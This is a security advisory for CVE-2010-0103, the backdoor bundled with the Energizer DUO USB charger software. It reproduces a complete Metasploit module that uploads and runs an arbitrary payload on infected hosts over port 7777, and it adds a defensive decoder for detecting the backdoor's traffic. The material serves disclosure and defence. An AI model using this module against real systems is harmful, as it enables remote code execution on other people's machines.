Energizer DUO USB Charger Unauthorized Access Vulnerability
Release date: 2010-03-05
Update date: 2010-03-18
Affected systems:
Energizer Energizer DUO
Description:
BUGTRAQ ID: 38571
CVE ID: CVE-2010-0103
The Energizer DUO is a fast USB battery charger.
The software shipped with the Energizer DUO contains a security vulnerability in its implementation. An attacker can exploit it to list arbitrary directories, send and receive files, and execute arbitrary code on the affected system.
<*Source: Ed Schaller
Link: http://osvdb.org/show/osvdb/62782
*>
Test method:
Warning
The following program (method) may be offensive in nature and is provided solely for security research and teaching. Use at your own risk!
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'          => 'Energizer DUO Trojan Code Execution',
      'Description'   => %q{
        This module will execute an arbitrary payload against
        any system infected with the Arugizer trojan horse. This
        backdoor was shipped with the software package accompanying
        the Energizer Duo USB battery charger.
      },
      'Author'        => [ 'hdm' ],
      'License'       => MSF_LICENSE,
      'Version'       => '$Revision: 8749 $',
      'References'    =>
        [
          ['CVE', '2010-0103'],
          ['URL', 'http://www.kb.cert.org/vuls/id/154421']
        ],
      'Platform'      => 'win',
      'Targets'       =>
        [
          [ 'Automatic', { } ],
        ],
      'DefaultTarget' => 0
    ))

    register_options(
      [
        Opt::RPORT(7777),
      ], self.class)
  end

  # Every byte on the wire is XORed with 0xE5; XOR is its own inverse,
  # so the same routine also decodes traffic from the backdoor.
  def trojan_encode(str)
    str.unpack("C*").map{|c| c ^ 0xE5}.pack("C*")
  end

  # A command record is a little-endian 32-bit length followed by the
  # NUL-terminated command GUID, the whole record XOR-encoded.
  def trojan_command(cmd)
    cid = ""
    case cmd
    when :exec
      cid = "{8AF1C164-EBD6-4b2b-BC1F-64674E98A710}"
    when :dir
      cid = "{0174D2FC-7CB6-4a22-87C7-7BB72A32F19F}"
    when :write
      cid = "{98D958FC-D0A2-4f1c-B841-232AB357E7C8}"
    when :read
      cid = "{F6C43E1A-1551-4000-A483-C361969AEC41}"
    when :nop
      cid = "{783EACBF-EF8B-498e-A059-F0B5BD12641E}"
    when :find
      cid = "{EA7A2EB7-1E49-4d5f-B4D8-D6645B7440E3}"
    when :yes
      cid = "{E2AC5089-3820-43fe-8A4D-A7028FAD8C28}"
    when :runonce
      cid = "{384EBE2C-F9EA-4f6b-94EF-C9D2DA58FD13}"
    when :delete
      cid = "{4F4F0D88-E715-4b1f-B311-61E530C2C8FC}"
    end
    trojan_encode(
      [cid.length + 1].pack("V") + cid + "\x00"
    )
  end

  def exploit
    nam = "C:\\" + Rex::Text.rand_text_alphanumeric(12) + ".exe" + "\x00"
    exe = Msf::Util::EXE.to_win32pe(framework, payload.encoded) + "\x00"

    print_status("Trying to upload #{nam}...")
    connect

    # Write file request: command, then length-prefixed name and contents
    sock.put(trojan_command(:write))
    sock.put(trojan_encode([nam.length].pack("V")))
    sock.put(trojan_encode(nam))
    sock.put(trojan_encode([exe.length].pack("V")))
    sock.put(trojan_encode(exe))

    # Required to prevent the server from spinning a loop
    sock.put(trojan_command(:nop))
    disconnect

    #
    # Execute the payload
    #
    print_status("Trying to execute #{nam}...")
    connect

    # Execute file request
    sock.put(trojan_command(:exec))
    sock.put(trojan_encode([nam.length].pack("V")))
    sock.put(trojan_encode(nam))

    # Required to prevent the server from spinning a loop
    sock.put(trojan_command(:nop))
    disconnect
  end
end
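For defenders, the same wire format the module speaks (XOR 0xE5, little-endian length prefix, NUL-terminated command GUID) is what a sensor or pcap triage script has to recognise on TCP port 7777. The following decoder is an added example, not part of the Metasploit module or the advisory; the function names, the table layout and the constructed sample request are assumptions of this example.

```ruby
# Decoder for the Arugizer backdoor command records described above.
# Added example for detection and forensics; names are this example's own.

ARUGIZER_COMMANDS = {
  "{8AF1C164-EBD6-4b2b-BC1F-64674E98A710}" => :exec,
  "{0174D2FC-7CB6-4a22-87C7-7BB72A32F19F}" => :dir,
  "{98D958FC-D0A2-4f1c-B841-232AB357E7C8}" => :write,
  "{F6C43E1A-1551-4000-A483-C361969AEC41}" => :read,
  "{783EACBF-EF8B-498e-A059-F0B5BD12641E}" => :nop,
  "{EA7A2EB7-1E49-4d5f-B4D8-D6645B7440E3}" => :find,
  "{E2AC5089-3820-43fe-8A4D-A7028FAD8C28}" => :yes,
  "{384EBE2C-F9EA-4f6b-94EF-C9D2DA58FD13}" => :runonce,
  "{4F4F0D88-E715-4b1f-B311-61E530C2C8FC}" => :delete,
}.freeze

XOR_KEY = 0xE5

# XOR with a constant is its own inverse: one routine encodes and decodes.
def arugizer_xor(bytes)
  bytes.unpack("C*").map { |c| c ^ XOR_KEY }.pack("C*")
end

# Parse one decoded command record: 4-byte LE length, GUID, trailing NUL.
# Returns [command_symbol, bytes_consumed], or nil if the record is not a
# well-formed Arugizer command (wrong length, missing NUL, unknown GUID).
def parse_command(decoded, offset = 0)
  return nil if decoded.bytesize < offset + 4
  len = decoded.byteslice(offset, 4).unpack1("V")
  return nil if len < 2 || decoded.bytesize < offset + 4 + len
  body = decoded.byteslice(offset + 4, len)
  return nil unless body.end_with?("\x00")
  cmd = ARUGIZER_COMMANDS[body.chomp("\x00")]
  cmd ? [cmd, 4 + len] : nil
end

# Classify a raw TCP payload seen on the backdoor's port (7777 in the
# module above). Returns the command symbol, or nil for unrelated traffic,
# so an alert can name the backdoor operation (:write, :exec, ...) observed.
def detect_arugizer(raw)
  rec = parse_command(arugizer_xor(raw))
  rec && rec[0]
end

# Constructed sample: what a :dir request looks like on the wire.
# The GUID is 38 characters, plus one NUL, hence the length prefix 39.
SAMPLE_DIR_REQUEST = arugizer_xor(
  [39].pack("V") + "{0174D2FC-7CB6-4a22-87C7-7BB72A32F19F}" + "\x00"
)
```

A host that answers on this port with records in this encoding is infected regardless of whether the charger software is still installed, so the check belongs in network monitoring as well as on the endpoint.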
Recommendation:
Vendor patch:
Energizer
---------
The vendor has not yet released a patch or upgrade. Users of this software are advised to monitor the vendor's homepage for the latest version:
http://www.energizer.com/Pages/default.aspx